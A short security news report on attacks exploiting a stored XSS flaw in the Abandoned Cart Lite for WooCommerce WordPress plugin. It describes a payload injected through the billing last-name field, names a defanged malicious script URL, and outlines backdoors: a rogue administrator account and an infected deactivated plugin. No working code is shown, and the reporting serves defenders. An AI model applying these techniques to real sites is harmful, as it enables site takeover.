Unpatched versions of the Abandoned Cart for WooCommerce plugin for WordPress have been exploited in attacks, researchers say. Apparently, there’s a dangerous XSS (cross-site scripting) vulnerability in the plugin which affects both paid and free versions of the plugin.
Last month, a stored cross-site scripting (XSS) flaw was patched in version 5.2.0 of the popular WordPress plugin Abandoned Cart Lite For WooCommerce, said Wordfence researchers.
Abandoned Cart for WooCommerce WordPress Plugin Exploited in Attacks
How is the attack carried out? Cybercriminals create a cart with fake contact information, which is abandoned. According to the report, the names and emails are random, but the requests follow the same pattern: the generated first and last name are supplied together as billing_first_name, but the billing_last_name field contains the injected payload .
Тhe bit.ly shortener used in these attacks resolves to hXXps://cdn-bigcommerce[.]com/visionstat.js.
It should be noted that two backdoors are deployed in the attacks: a rogue administrator account is created, and a deactivated plugin is infected with a code execution script. Both of these actions are executed by creating a hidden iframe in the admin’s existing browser window, then simulating the process of filling out and submitting the necessary forms within it, researchers said.
The researchers had detected 5,251 accesses to the bit.ly link associated with the attacks.